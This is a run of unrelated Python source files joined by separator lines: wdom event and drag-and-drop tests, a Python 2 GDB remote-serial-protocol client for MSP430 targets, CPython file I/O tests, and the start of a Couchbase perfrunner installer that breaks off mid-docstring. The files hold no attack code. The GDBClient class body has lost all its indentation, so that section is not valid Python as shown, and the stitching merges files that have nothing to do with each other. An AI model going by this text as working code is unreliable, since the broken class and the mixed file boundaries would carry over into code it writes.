        self.assertEqual(dt.getData('text/html'), 'test3')
        # clearData(type) removes only that type...
        dt.clearData('text/plain')
        self.assertEqual(dt.getData('text/plain'), '')
        self.assertEqual(dt.getData('text/html'), 'test3')
        # ...while clearData() with no argument removes everything.
        dt.clearData()
        self.assertEqual(dt.getData('text/plain'), '')
        self.assertEqual(dt.getData('text/html'), '')

    def test_normalize(self):
        # The shorthand type 'text' is normalized to 'text/plain'.
        dt = DataTransfer()
        dt.setData('text', 'test')
        self.assertEqual(dt.getData('text'), 'test')
        self.assertEqual(dt.getData('text/plain'), 'test')
        self.assertEqual(dt.getData('text/html'), '')
        dt.clearData('text')
        self.assertEqual(dt.getData('text'), '')
        self.assertEqual(dt.getData('text/plain'), '')
        self.assertEqual(dt.getData('text/html'), '')
class TestEvent(TestCase):
    """Tests for the plain Event class and the create_event factory."""

    def setUp(self):
        self.msg = {'type': 'event'}
        self.e = Event('event', init=self.msg)

    def test_event(self):
        self.assertEqual(self.e.type, 'event')
        self.assertIs(self.e.init, self.msg)
        # Without target info the event is not bound to any element.
        self.assertIsNone(self.e.currentTarget)
        self.assertIsNone(self.e.target)

    def test_create_event(self):
        # Renamed from the misspelled `test_craete_event`.
        self.elm = WdomElement('tag')
        msg = {
            'proto': 'event',
            'type': 'event',
            'currentTarget': {'id': self.elm.wdom_id},
            'target': {'id': self.elm.wdom_id},
        }
        e = create_event(msg)
        self.assertEqual(e.type, 'event')
        # Targets are resolved from their wdom_id back to the live element.
        self.assertIs(e.currentTarget, self.elm)
        self.assertIs(e.target, self.elm)
        self.assertIs(e.init, msg)
class TestDragEvent(TestCase):
    """Tests for DragEvent and its shared DataTransfer store.

    msg1-msg3 share dataTransfer id '1'; msg4/msg5 use id '2', so events
    built from them must see independent DataTransfer objects.
    """

    def setUp(self):
        super().setUp()
        self.msg = {
            'type': 'drag',
            'proto': 'DragEvent',
            'dataTransfer': {'id': ''},
        }
        self.msg1 = deepcopy(self.msg)
        self.msg2 = deepcopy(self.msg)
        self.msg3 = deepcopy(self.msg)
        self.msg4 = deepcopy(self.msg)
        self.msg5 = deepcopy(self.msg)
        self.msg1['type'] = 'dragstart'
        self.msg2['type'] = 'dragend'
        self.msg3['type'] = 'drop'
        self.msg4['type'] = 'dragstart'
        self.msg5['type'] = 'drop'
        self.msg1['dataTransfer']['id'] = '1'
        self.msg2['dataTransfer']['id'] = '1'
        self.msg3['dataTransfer']['id'] = '1'
        self.msg4['dataTransfer']['id'] = '2'
        self.msg5['dataTransfer']['id'] = '2'

    def tearDown(self):
        # The store is class-level state; clear it so tests stay independent.
        DataTransfer._store.clear()
        super().tearDown()

    def test_init(self):
        de = DragEvent('drag', self.msg)
        self.assertEqual(de.type, 'drag')
        self.assertEqual(de.dataTransfer.getData('test'), '')

    def test_start_drop_end(self):
        # dragstart registers the DataTransfer in the store...
        de1 = DragEvent('dragstart', self.msg1)
        self.assertEqual(len(DataTransfer._store), 1)
        de1.dataTransfer.setData('text/plain', 'test')
        self.assertEqual(de1.dataTransfer.getData('text/plain'), 'test')
        # ...drop with the same id sees the same data...
        de3 = DragEvent('drop', self.msg3)
        self.assertEqual(len(DataTransfer._store), 1)
        self.assertEqual(de3.dataTransfer.getData('text/plain'), 'test')
        # ...and dragend removes it from the store.
        de2 = DragEvent('dragend', self.msg2)
        self.assertEqual(len(DataTransfer._store), 0)
        self.assertEqual(de2.dataTransfer.getData('text/plain'), 'test')

    def test_different_id(self):
        de1 = DragEvent('dragstart', self.msg1) # id = 1
        self.assertEqual(len(DataTransfer._store), 1)
        de1.dataTransfer.setData('text/plain', 'test')
        # A drop with a different id gets a fresh, empty DataTransfer.
        de2 = DragEvent('drop', self.msg5) # id = 2
        self.assertEqual(len(DataTransfer._store), 2)
        self.assertEqual(de2.dataTransfer.getData('text/plain'), '')
        de3 = DragEvent('drop', self.msg3) # id = 1
        self.assertEqual(len(DataTransfer._store), 2)
        self.assertEqual(de3.dataTransfer.getData('text/plain'), 'test')
class TestCreateEventMsg(TestCase):
    """Tests for building Event objects from server-side messages."""

    def setUp(self):
        self.elm = WdomElement('tag')
        self.doc = get_document()

    def test_event_from_msg(self):
        msg = {
            'type': 'event',
            'currentTarget': {'id': self.elm.wdom_id},
            'target': {'id': self.elm.wdom_id},
        }
        e = create_event_from_msg(msg)
        self.assertEqual(e.type, 'event')
        self.assertIs(e.currentTarget, self.elm)
        self.assertIs(e.target, self.elm)
        self.assertIs(e.init, msg)
        self.assertTrue(isinstance(e, Event))

    def test_event_from_msg_proto(self):
        # 'proto' selects the concrete Event subclass (here MouseEvent).
        msg = {
            'proto': 'MouseEvent',
            'type': 'event',
            'currentTarget': {'id': self.elm.wdom_id},
            'target': {'id': self.elm.wdom_id},
        }
        e = create_event_from_msg(msg)
        self.assertEqual(e.type, 'event')
        self.assertIs(e.currentTarget, self.elm)
        self.assertIs(e.target, self.elm)
        self.assertIs(e.init, msg)
        self.assertTrue(isinstance(e, Event))
        self.assertTrue(isinstance(e, MouseEvent))

    def test_event_from_msg_notarget(self):
        # Messages without target info yield an unbound event.
        msg = {
            'type': 'event',
        }
        e = create_event_from_msg(msg)
        self.assertEqual(e.type, 'event')
        self.assertIsNone(e.currentTarget)
        self.assertIsNone(e.target)
        self.assertIs(e.init, msg)
class TestEventListener(TestCase):
    """EventListener must support both plain and coroutine callbacks."""

    def setUp(self):
        self._cofunc_call_count = 0
        self._cofunc_calls = []

        async def a(event):
            # Record the call on the test instance. (Removed a useless
            # `nonlocal self` — `self` is only read via attribute access,
            # never rebound, so no declaration is needed.)
            self._cofunc_call_count += 1
            self._cofunc_calls.append(event)
            await asyncio.sleep(0)

        self.e = Event('event')
        self.func = MagicMock(_is_coroutine=False)
        self.cofunc = a
        self.func_listener = EventListener(self.func)
        self.cofunc_listener = EventListener(self.cofunc)

    def test_func(self):
        self.func_listener(self.e)
        self.func.assert_called_once_with(self.e)

    @sync
    async def test_cofunc(self):
        await self.cofunc_listener(self.e)
        self.assertEqual(self._cofunc_call_count, 1)
        self.assertEqual(self._cofunc_calls[0], self.e)
class TestEventTarget(TestCase):
    """Tests for EventTarget listener registration and dispatch."""

    def setUp(self):
        self.target = EventTarget()
        self.mock = MagicMock(_is_coroutine=False)
        self.e = Event('click')

    def test_event_dispatch(self):
        self.target.addEventListener('click', self.mock)
        self.assertEqual(len(self.target._event_listeners), 1)
        self.target.dispatchEvent(self.e)
        self.mock.assert_called_once_with(self.e)

    def test_event_dispatch_empty(self):
        # Dispatch without a registered listener is a no-op.
        self.target.dispatchEvent(self.e)
        self.mock.assert_not_called()

    def test_event_dispatch_multi(self):
        e1 = Event('click')
        e2 = Event('click')
        self.target.addEventListener('click', self.mock)
        self.target.dispatchEvent(e1)
        self.target.dispatchEvent(e2)
        self.assertEqual(self.mock.call_count, 2)
        self.mock.assert_has_calls([call(e1), call(e2)])

    def test_different_event_dispatch(self):
        # Renamed from the misspelled `test_defferent_event_dispatch`.
        # Listeners fire only for their own event type.
        mock1 = MagicMock(_is_coroutine=False)
        mock2 = MagicMock(_is_coroutine=False)
        e1 = Event('click')
        e2 = Event('event')
        self.target.addEventListener('click', mock1)
        self.target.addEventListener('event', mock2)
        self.assertEqual(len(self.target._event_listeners), 2)
        self.target.dispatchEvent(e1)
        mock1.assert_called_once_with(e1)
        mock2.assert_not_called()
        self.target.dispatchEvent(e2)
        mock1.assert_called_once_with(e1)
        mock2.assert_called_once_with(e2)

    def test_remove_event(self):
        self.target.addEventListener('click', self.mock)
        self.target.removeEventListener('click', self.mock)
        self.target.dispatchEvent(self.e)
        self.mock.assert_not_called()

    def test_remove_event_multi(self):
        self.target.addEventListener('click', self.mock)
        self.assertEqual(len(self.target._event_listeners), 1)
        self.target.removeEventListener('click', self.mock)
        self.assertEqual(len(self.target._event_listeners), 0)
        self.target.dispatchEvent(self.e)
        self.mock.assert_not_called()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2002-2010 Chris Liechti <cliechti@gmx.net>
# All Rights Reserved.
# Simplified BSD License (see LICENSE.txt for full text)
"""\
Interface to GDB server suing a TCP/IP connection.
It can be used to talk to e.g. msp430-gdbproxy or mspdebug.
"""
from struct import pack, unpack
import socket
import threading
import Queue
class GDBException(Exception):
    """Generic protocol errors; base class for all GDB client exceptions."""
class GDBRemoteTimeout(GDBException):
    """If target does not answer within the command timeout"""
class GDBRemoteTooManyFailures(GDBException):
    """If communication with the target fails too many times
    (docstring was a copy-paste of GDBRemoteTimeout's; not raised in
    the code visible here — presumably reserved for NACK limits)"""
class GDBUnknownCommandError(GDBException):
    """If target does not know this command (empty reply packet)"""
class GDBRemoteError(GDBException):
    """Target answered with 'E' (error) packet"""

    def __init__(self, errorcode, message):
        # errorcode: numeric code from the 'Enn' packet; message: readable text.
        GDBException.__init__(self, message)
        self.errorcode = errorcode

    def getErrorCode(self):
        """Return the numeric error code from the target."""
        return self.errorcode
HEXDIGITS = '0123456789abcdefABCDEF'

# Receiver state machine states: idle, packet payload, 1st/2nd checksum digit.
IDLE, DATA, CRC1, CRC2 = ' ', '$', '1', '2'
# Acknowledgement states for transmitted packets.
WAITING, SUCCESS, FAILURE = 0, 1, 2

# breakpoint/watchpoint types (the 't' field of z/Z packets):
BRK_SOFTWARE = 0
BRK_HARDWARE = 1
BRK_WRITEWATCH = 2
BRK_READWATCH = 3
BRK_ACCESSWATCH = 4

# Stop Reply Packet categories returned by decodeStopReplyPackets().
STOP_SIGNAL = 'signal'
STOP_THREAD = 'thread'
STOP_EXITED = 'exited'
class ClientSocketConnector(threading.Thread):
    """\
    Make a connection through a TCP/IP socket. This version connects to a
    server (i.e. is a client).

    A daemon reader thread feeds received chunks to handle_partial_data(),
    which subclasses must provide.
    """

    def __init__(self, host_port):
        """
        The host/port tuple from the parameter is used to open a TCP/IP
        connection. It is passed to socket.connect().
        """
        threading.Thread.__init__(self)
        self.setDaemon(True)    # we don't want to block on exit
        self._alive = True
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect(host_port)
        # Short timeout so the reader loop wakes up and can re-check _alive.
        self.socket.settimeout(5)
        self.start()

    def write(self, text):
        """Just send everything"""
        self.socket.sendall(text)

    def close(self):
        """Close connection."""
        self.socket.shutdown(socket.SHUT_RDWR)
        self.socket.close()
        self._alive = False

    def run(self):
        """\
        Implement an efficient read loop for sockets.
        """
        while self._alive:
            try:
                text = self.socket.recv(1024)
            except socket.timeout:
                pass                # periodic wakeup; loop re-checks _alive
            except socket.error:
                break               # socket error -> terminate
            else:
                if not text: break  # EOF -> terminate
                self.handle_partial_data(text)
        self._alive = False
def identity(x):
    """Default answer decoder: return the message unchanged."""
    return x
def decodeStopReplyPackets(message):
    """Decode a GDB Stop Reply Packet ('S', 'T' and 'W'/'X' forms)."""
    kind = message[0:1]
    if kind == 'S':
        # Stopped with a signal: "Snn"
        return STOP_SIGNAL, int(message[1:], 16)
    elif kind == 'T':
        # "Tnn;key:value;..." — signal number plus extra key/value pairs
        signal = int(message[1:3], 16)
        payload = message[3:]
        if payload.endswith(';'):
            payload = payload[:-1]
        extra = payload.split(';')
        return STOP_THREAD, signal, extra
    elif kind in ('W', 'X'):
        # Process exited ('W') or terminated by a signal ('X')
        return STOP_EXITED, int(message[1:], 16)
    else:
        raise GDBException("unknown Stop Reply Packet")
def hex2registers(message):
    """Decode 16 little-endian 16-bit registers from a hex string
    (Python 2 str.decode('hex'))."""
    raw = bytes(message).decode('hex')
    return list(unpack('<16H', raw))
def decodeRegister(message):
    """Decode one little-endian 16-bit register from a hex string (Py2)."""
    return unpack('<H', bytes(message).decode('hex'))[0]
def encodeRegister(value):
    """Encode a 16-bit register value as a little-endian hex string (Py2)."""
    return bytes(pack('<H', value).encode('hex'))
class GDBClient(ClientSocketConnector):
def __init__(self, *args, **kwargs):
ClientSocketConnector.__init__(self, *args, **kwargs)
self.packet = []
self.recv_mode = IDLE
self.acknowledged = None
self.errorcounter = 0 # count NACKS
self.decoder = None
self._lock = threading.Lock()
self.answer = Queue.Queue()
def handle_partial_data(self, data):
#~ print data
for character in data:
if character == '+':
#~ print "ACK" #XXX DEBUG
self.acknowledged = SUCCESS
#~ self.answer.put(None)
elif character == '-':
#~ print "NACK" #XXX DEBUG
self.errorcounter += 1
self.answer.put(GDBRemoteError('Checksum error'))
elif character == '$':
del self.packet[:]
self.recv_mode = DATA
elif character == '#':
self.recv_mode = CRC1
else:
if self.recv_mode == DATA: # save data in packet
self.packet.append(character)
elif self.recv_mode == CRC1: # get checksum 1
if character in HEXDIGITS:
self.c1 = character
self.recv_mode = CRC2
elif self.recv_mode == CRC2: # get checksum 2
if character in HEXDIGITS:
c2 = character
checksum = 0
for character in self.packet:
checksum = (checksum + ord(character)) & 0xff
if int(self.c1 + c2, 16) == checksum:
self.write('+')
self.handle_packet(''.join(self.packet))
del self.packet[:]
self.recv_mode = IDLE
else:
self.write('-')
def handle_packet(self, packet):
#~ print 'handle_packet(%r) decoder=%r' % (packet, self.decoder)
if packet == '':
self.answer.put(GDBUnknownCommandError("Unknown command"))
elif packet[0:1] == 'E':
errorcode = int(packet[1:],16)
self.answer.put(GDBRemoteError(errorcode, "Target responded with error code %d" % errorcode))
elif packet[0:2] == 'OK':
self.answer.put(None)
elif packet[0:1] == 'o' or packet[0:1] == 'O':
message = packet[1:]
if len(message) & 1:
print "Odd length 'o' message - cutting off last character" #XXX hack
message = message[:-1]
self.output(message.decode('hex'))
else:
self.answer.put(packet.decode('hex'))
#~ else:
#~ print "unwanted packet: %r" % packet #XXX ugly
# --- callbacks ---
def output(self, message):
"""called on 'o' (output) packages"""
print "REMOTE>", message
# --- commands ---
def set_extended(self):
"""! -- extended mode
expected answer '' or 'OK'"""
return self._remote_command('!')
def last_signal(self):
"""? -- last signal
expected answer Stop Reply Packets"""
return self._remote_command('?', decoder=decodeStopReplyPackets)
def cont(self, startaddress=None, nowait=False):
"""caddr -- continue
expected answer Stop Reply Packets"""
return self._remote_command('c%s' % (
startaddress is not None and '%x' % startaddress or ''
), decoder=decodeStopReplyPackets, nowait=nowait, timeout=None
)
def cont_with_signal(self, signal, startaddress=None):
"""Csig;addr -- continue with signal
expected answer Stop Reply Packets"""
return self._remote_command('C%02x%s' % (
signal,
startaddress is not None and ';%x' % startaddress or ''
), decoder=decodeStopReplyPackets
)
#~ def gdbDetach(self):
#~ """D -- detach
#~ no answer"""
#~ return self._remote_command('D')
def read_registers(self):
"""g -- read registers
expected answer 'XX...' or 'ENN'"""
return self._remote_command('g', decoder=hex2registers)
def write_registers(self, registers):
"""GXX... -- write registers
expected answer 'OK' or 'ENN'"""
return self._remote_command('G%s' % ''.join([encodeRegister(r) for r in registers]))
def cycle_step(self, cycles, startaddress=None):
"""iaddr,nnn -- cycle step (draft)
expected answer 'OK' or 'ENN'"""
return self._remote_command('i%s,%x' % (startaddress is not None and '%x' % startaddress or '', cycles))
def read_memory(self, startaddress, size):
"""maddr,length -- read memory
expected answer 'XX...' or 'Enn'"""
return self._remote_command('m%x,%x' % (startaddress, size))
def write_memory(self, startaddress, data):
"""maddr,length -- read memory
expected answer 'OK' or 'Enn'"""
return self._remote_command('M%x,%x:%s' % (startaddress, len(data), bytes(data).encode('hex')))
def read_register(self, regnum):
"""pn... -- read reg (reserved)
expected answer 'XX...' or 'Enn'"""
return self._remote_command('p%x' % (regnum), decoder=decodeRegister)
def write_register(self, regnum, value):
"""Pn...=r... -- write register
expected answer 'OK' or 'Enn'"""
return self._remote_command('P%x=%s' % (regnum, encodeRegister(value)))
def query(self, query, nowait=False):
"""query -- general query
expected answer 'OK' or 'Enn' or ''"""
return self._remote_command('q%s' % (query,), nowait=nowait)
def set(self, name, value):
"""Qvar=val -- general set
expected answer 'OK' or 'Enn' or ''"""
return self._remote_command('Q%s=%s' % (name, value))
#~ def gdbRemoteRestart(self):
#~ """RXX -- remote restart
#~ no answer expected"""
#~ return self._remote_command('Q%s=%s' % (querry, value))
def step(self, startaddress = None):
"""saddr -- step
expected answer Stop Reply Packets"""
return self._remote_command('s%s' % (
startaddress is not None and '%x' % startaddress or ''
), decoder=decodeStopReplyPackets
)
def step_with_signal(self, signal, startaddress=None):
"""Ssig;addr -- step with signal
expected answer Stop Reply Packets"""
return self._remote_command('S%02x%s' % (
signal,
startaddress is not None and ';%x' % startaddress or ''
), decoder=decodeStopReplyPackets
)
def write_memory_binary(self, startaddress, data):
"""maddr,data -- write memory
expected answer 'OK' or 'Enn'"""
def escape(s):
res = []
for c in s:
if c in ('$', '#', '\x7d'):
res.extend(['\x7d', chr(ord(c) ^ 0x20)])
else:
res.append(c)
return ''.join(res)
return self._remote_command('X%x,%x:%s' % (startaddress, len(data), escape(data)))
def remove_breakpoint(self, type, address, length):
"""zt,addr,length -- remove break or watchpoint (draft)
expected answer 'OK' 'Enn' or ''"""
return self._remote_command('z%x,%x,%x' % (type, address, length))
def set_breakpoint(self, type, address, length):
"""Zt,addr,length -- insert break or watchpoint (draft)
expected answer 'OK' 'Enn' or ''"""
return self._remote_command('Z%x,%x,%x' % (type, address, length))
def monitor(self, command, nowait=False):
"""pass commands to the target interpreter
expected answer 'OK' or 'Enn' or ''"""
return self.query('Rcmd,%s' % bytes(command).encode('hex'), nowait=nowait)
# ---
def interrupt(self):
"""send Control+C.
may be used to stop the target if it is running (e.g. after a 'c' command).
no effect on a stopped target."""
self.write('\x03')
# --- internal helper ---
def _remote_command(self, cmd, decoder=identity, timeout=3, nowait=False):
self._lock.acquire()
try:
# clear queue
while self.answer.qsize():
self.answer.get_nowait()
# send new commnad
checksum = 0
for character in cmd:
checksum = (checksum + ord(character)) & 0xff
message = '$%s#%02x' % (cmd, checksum)
self.write(message)
if nowait:
return
ans = self.answer.get(timeout=timeout)
if isinstance(ans, Exception):
raise ans
else:
return decoder(ans)
except Queue.Empty:
raise GDBRemoteTimeout('no answer to command received within time')
finally:
self._lock.release()
# ----- test code only below this line -----
if __name__ == '__main__':
    # Ad-hoc smoke test: connect to a local gdbproxy on port 2000, issue a
    # 'monitor help' and give the reader thread time to print the output.
    gdb = GDBClient(('', 2000))
    gdb.monitor('help')
    import time; time.sleep(5)
| |
import sys
import os
import unittest
from array import array
from weakref import proxy
import io
import _pyio as pyio
from test.support import TESTFN, run_unittest, gc_collect
from collections import UserList
class AutoFileTests(unittest.TestCase):
    # file tests for which a test file is automatically set up
    # (subclasses provide the `open` implementation under test)

    def setUp(self):
        self.f = self.open(TESTFN, 'wb')

    def tearDown(self):
        if self.f:
            self.f.close()
        os.remove(TESTFN)

    def testWeakRefs(self):
        # verify weak references
        p = proxy(self.f)
        p.write(b'teststring')
        self.assertEqual(self.f.tell(), p.tell())
        self.f.close()
        self.f = None
        gc_collect()
        # once the file object is gone, the proxy must be dead too
        self.assertRaises(ReferenceError, getattr, p, 'tell')

    def testAttributes(self):
        # verify expected attributes exist
        f = self.f
        f.name     # merely shouldn't blow up
        f.mode     # ditto
        f.closed   # ditto

    def testReadinto(self):
        # verify readinto
        self.f.write(b'12')
        self.f.close()
        a = array('b', b'x'*10)
        self.f = self.open(TESTFN, 'rb')
        n = self.f.readinto(a)
        self.assertEqual(b'12', a.tobytes()[:n])

    def testReadinto_text(self):
        # verify readinto refuses text files
        a = array('b', b'x'*10)
        self.f.close()
        self.f = self.open(TESTFN, 'r')
        if hasattr(self.f, "readinto"):
            self.assertRaises(TypeError, self.f.readinto, a)

    def testWritelinesUserList(self):
        # verify writelines with instance sequence
        l = UserList([b'1', b'2'])
        self.f.writelines(l)
        self.f.close()
        self.f = self.open(TESTFN, 'rb')
        buf = self.f.read()
        self.assertEqual(buf, b'12')

    def testWritelinesIntegers(self):
        # verify writelines with integers
        self.assertRaises(TypeError, self.f.writelines, [1, 2, 3])

    def testWritelinesIntegersUserList(self):
        # verify writelines with integers in UserList
        l = UserList([1,2,3])
        self.assertRaises(TypeError, self.f.writelines, l)

    def testWritelinesNonString(self):
        # verify writelines with non-string object
        class NonString:
            pass

        self.assertRaises(TypeError, self.f.writelines,
                          [NonString(), NonString()])

    def testErrors(self):
        f = self.f
        self.assertEqual(f.name, TESTFN)
        self.assertTrue(not f.isatty())
        self.assertTrue(not f.closed)

        if hasattr(f, "readinto"):
            self.assertRaises((IOError, TypeError), f.readinto, "")
        f.close()
        self.assertTrue(f.closed)

    def testMethods(self):
        # every method must raise ValueError once the file is closed
        methods = [('fileno', ()),
                   ('flush', ()),
                   ('isatty', ()),
                   ('__next__', ()),
                   ('read', ()),
                   ('write', (b"",)),
                   ('readline', ()),
                   ('readlines', ()),
                   ('seek', (0,)),
                   ('tell', ()),
                   ('write', (b"",)),
                   ('writelines', ([],)),
                   ('__iter__', ()),
                   ]

        methods.append(('truncate', ()))

        # __exit__ should close the file
        self.f.__exit__(None, None, None)
        self.assertTrue(self.f.closed)

        for methodname, args in methods:
            method = getattr(self.f, methodname)
            # should raise on closed file
            self.assertRaises(ValueError, method, *args)

        # file is closed, __exit__ shouldn't do anything
        self.assertEqual(self.f.__exit__(None, None, None), None)
        # it must also return None if an exception was given
        try:
            1/0
        except:
            self.assertEqual(self.f.__exit__(*sys.exc_info()), None)

    def testReadWhenWriting(self):
        self.assertRaises(IOError, self.f.read)
class CAutoFileTests(AutoFileTests):
    # run AutoFileTests against the C implementation (io)
    open = io.open
class PyAutoFileTests(AutoFileTests):
    # run AutoFileTests against the pure-Python implementation (_pyio)
    open = staticmethod(pyio.open)
class OtherFileTests(unittest.TestCase):
    # miscellaneous file tests; subclasses provide the `open` under test

    def testModeStrings(self):
        # check invalid mode strings
        for mode in ("", "aU", "wU+"):
            try:
                f = self.open(TESTFN, mode)
            except ValueError:
                pass
            else:
                f.close()
                self.fail('%r is an invalid file mode' % mode)

    def testStdin(self):
        # This causes the interpreter to exit on OSF1 v5.1.
        if sys.platform != 'osf1V5':
            self.assertRaises((IOError, ValueError), sys.stdin.seek, -1)
        else:
            print((
                '  Skipping sys.stdin.seek(-1), it may crash the interpreter.'
                ' Test manually.'), file=sys.__stdout__)
        self.assertRaises((IOError, ValueError), sys.stdin.truncate)

    def testBadModeArgument(self):
        # verify that we get a sensible error message for bad mode argument
        bad_mode = "qwerty"
        try:
            f = self.open(TESTFN, bad_mode)
        except ValueError as msg:
            if msg.args[0] != 0:
                s = str(msg)
                if TESTFN in s or bad_mode not in s:
                    self.fail("bad error message for invalid mode: %s" % s)
            # if msg.args[0] == 0, we're probably on Windows where there may be
            # no obvious way to discover why open() failed.
        else:
            f.close()
            self.fail("no error for invalid mode: %s" % bad_mode)

    def testSetBufferSize(self):
        # make sure that explicitly setting the buffer size doesn't cause
        # misbehaviour especially with repeated close() calls
        for s in (-1, 0, 1, 512):
            try:
                f = self.open(TESTFN, 'wb', s)
                f.write(str(s).encode("ascii"))
                f.close()
                f.close()
                f = self.open(TESTFN, 'rb', s)
                d = int(f.read().decode("ascii"))
                f.close()
                f.close()
            except IOError as msg:
                self.fail('error setting buffer size %d: %s' % (s, str(msg)))
            self.assertEqual(d, s)

    def testTruncateOnWindows(self):
        # SF bug <http://www.python.org/sf/801631>
        # "file.truncate fault on windows"
        os.unlink(TESTFN)
        f = self.open(TESTFN, 'wb')

        try:
            f.write(b'12345678901')   # 11 bytes
            f.close()

            f = self.open(TESTFN,'rb+')
            data = f.read(5)
            if data != b'12345':
                self.fail("Read on file opened for update failed %r" % data)
            if f.tell() != 5:
                self.fail("File pos after read wrong %d" % f.tell())

            f.truncate()
            if f.tell() != 5:
                self.fail("File pos after ftruncate wrong %d" % f.tell())

            f.close()
            size = os.path.getsize(TESTFN)
            if size != 5:
                self.fail("File size after ftruncate wrong %d" % size)
        finally:
            f.close()
            os.unlink(TESTFN)

    def testIteration(self):
        # Test the complex interaction when mixing file-iteration and the
        # various read* methods.
        dataoffset = 16384
        filler = b"ham\n"
        assert not dataoffset % len(filler), \
            "dataoffset must be multiple of len(filler)"
        nchunks = dataoffset // len(filler)
        testlines = [
            b"spam, spam and eggs\n",
            b"eggs, spam, ham and spam\n",
            b"saussages, spam, spam and eggs\n",
            b"spam, ham, spam and eggs\n",
            b"spam, spam, spam, spam, spam, ham, spam\n",
            b"wonderful spaaaaaam.\n"
        ]
        methods = [("readline", ()), ("read", ()), ("readlines", ()),
                   ("readinto", (array("b", b" "*100),))]

        try:
            # Prepare the testfile
            bag = self.open(TESTFN, "wb")
            bag.write(filler * nchunks)
            bag.writelines(testlines)
            bag.close()
            # Test for appropriate errors mixing read* and iteration
            for methodname, args in methods:
                f = self.open(TESTFN, 'rb')
                if next(f) != filler:
                    # Bug fix: was `self.fail, "Broken testfile"` — a tuple
                    # expression that never actually called fail().
                    self.fail("Broken testfile")
                meth = getattr(f, methodname)
                meth(*args)  # This simply shouldn't fail
                f.close()

            # Test to see if harmless (by accident) mixing of read* and
            # iteration still works. This depends on the size of the internal
            # iteration buffer (currently 8192,) but we can test it in a
            # flexible manner.  Each line in the bag o' ham is 4 bytes
            # ("h", "a", "m", "\n"), so 4096 lines of that should get us
            # exactly on the buffer boundary for any power-of-2 buffersize
            # between 4 and 16384 (inclusive).
            f = self.open(TESTFN, 'rb')
            for i in range(nchunks):
                next(f)
            testline = testlines.pop(0)
            try:
                line = f.readline()
            except ValueError:
                self.fail("readline() after next() with supposedly empty "
                          "iteration-buffer failed anyway")
            if line != testline:
                self.fail("readline() after next() with empty buffer "
                          "failed. Got %r, expected %r" % (line, testline))
            testline = testlines.pop(0)
            buf = array("b", b"\x00" * len(testline))
            try:
                f.readinto(buf)
            except ValueError:
                self.fail("readinto() after next() with supposedly empty "
                          "iteration-buffer failed anyway")
            line = buf.tobytes()
            if line != testline:
                self.fail("readinto() after next() with empty buffer "
                          "failed. Got %r, expected %r" % (line, testline))
            testline = testlines.pop(0)
            try:
                line = f.read(len(testline))
            except ValueError:
                self.fail("read() after next() with supposedly empty "
                          "iteration-buffer failed anyway")
            if line != testline:
                self.fail("read() after next() with empty buffer "
                          "failed. Got %r, expected %r" % (line, testline))
            try:
                lines = f.readlines()
            except ValueError:
                self.fail("readlines() after next() with supposedly empty "
                          "iteration-buffer failed anyway")
            if lines != testlines:
                # Bug fix: the message previously interpolated the stale
                # single-line variables (line, testline) instead of the
                # values actually compared here.
                self.fail("readlines() after next() with empty buffer "
                          "failed. Got %r, expected %r" % (lines, testlines))
            f.close()

            # Reading after iteration hit EOF shouldn't hurt either
            f = self.open(TESTFN, 'rb')
            try:
                for line in f:
                    pass
                try:
                    f.readline()
                    f.readinto(buf)
                    f.read()
                    f.readlines()
                except ValueError:
                    self.fail("read* failed after next() consumed file")
            finally:
                f.close()
        finally:
            os.unlink(TESTFN)
class COtherFileTests(OtherFileTests):
    # run OtherFileTests against the C implementation (io)
    open = io.open
class PyOtherFileTests(OtherFileTests):
    # run OtherFileTests against the pure-Python implementation (_pyio)
    open = staticmethod(pyio.open)
def test_main():
    """Run all four test-class variants, then clean up the test file."""
    # Historically, these tests have been sloppy about removing TESTFN.
    # So get rid of it no matter what.
    try:
        run_unittest(CAutoFileTests, PyAutoFileTests,
                     COtherFileTests, PyOtherFileTests)
    finally:
        if os.path.exists(TESTFN):
            os.unlink(TESTFN)
if __name__ == '__main__':
    # Allow running this test module directly.
    test_main()
| |
import os
import sys
from argparse import ArgumentParser
from collections import namedtuple
from multiprocessing import Process, set_start_method
from typing import Iterator
import paramiko
import requests
import validators
from fabric.api import cd, run
from requests.exceptions import ConnectionError
from logger import logger
from perfrunner.helpers.local import detect_ubuntu_release
from perfrunner.helpers.remote import RemoteHelper
from perfrunner.remote.context import master_client
from perfrunner.settings import ClusterSpec
# Use "fork" so worker processes inherit parent state (relied on by the
# multiprocessing fan-out in CloudInstaller.install_package).
set_start_method("fork")
# Candidate base URLs for Couchbase Server packages, probed in order:
# per-codename latestbuilds directories first, then released builds.
LOCATIONS = (
    'http://172.23.126.166/builds/latestbuilds/couchbase-server/morpheus/{build}/',
    'http://172.23.126.166/builds/latestbuilds/couchbase-server/neo/{build}/',
    'http://172.23.126.166/builds/latestbuilds/couchbase-server/magma-preview/{build}/',
    'http://172.23.126.166/builds/latestbuilds/couchbase-server/cheshire-cat/{build}/',
    'http://172.23.126.166/builds/latestbuilds/couchbase-server/mad-hatter/{build}/',
    'http://172.23.126.166/builds/latestbuilds/couchbase-server/alice/{build}/',
    'http://172.23.126.166/builds/latestbuilds/couchbase-server/vulcan/{build}/',
    'http://172.23.126.166/builds/latestbuilds/couchbase-server/spock/{build}/',
    'http://172.23.126.166/builds/latestbuilds/couchbase-server/watson/{build}/',
    'http://172.23.126.166/builds/latestbuilds/couchbase-server/master/{build}/',
    'http://172.23.126.166/builds/releases/{release}/',
    'http://172.23.126.166/builds/releases/{release}/ce/',
)
# Package filename patterns per package format, probed in order against each
# entry in LOCATIONS. Placeholders: {edition}, {release}, {build}, {os}.
PKG_PATTERNS = {
    'rpm': (
        'couchbase-server-{edition}-{release}-{build}-centos{os}.x86_64.rpm',
        'couchbase-server-{edition}-{release}-centos{os}.x86_64.rpm',
        'couchbase-server-{edition}-{release}-centos6.x86_64.rpm',
        'couchbase-server-{edition}-{release}-{build}-{os}.rpm',
        'couchbase-server-{edition}-{release}-{os}.rpm',
    ),
    'deb': (
        'couchbase-server-{edition}_{release}-{build}-ubuntu{os}_amd64.deb',
        'couchbase-server-{edition}_{release}-ubuntu{os}_amd64.deb',
    ),
    'exe': (
        'couchbase-server-{edition}_{release}-{build}-windows_amd64.msi',
        'couchbase-server-{edition}_{release}-{build}-windows_amd64.exe',
        'couchbase-server-{edition}_{release}-windows_amd64.exe',
    ),
}
# A resolved package: its bare filename plus the full download URL.
Build = namedtuple('Build', ['filename', 'url'])
class OperatorInstaller:
    """Install/uninstall the Couchbase Autonomous Operator and a celery broker.

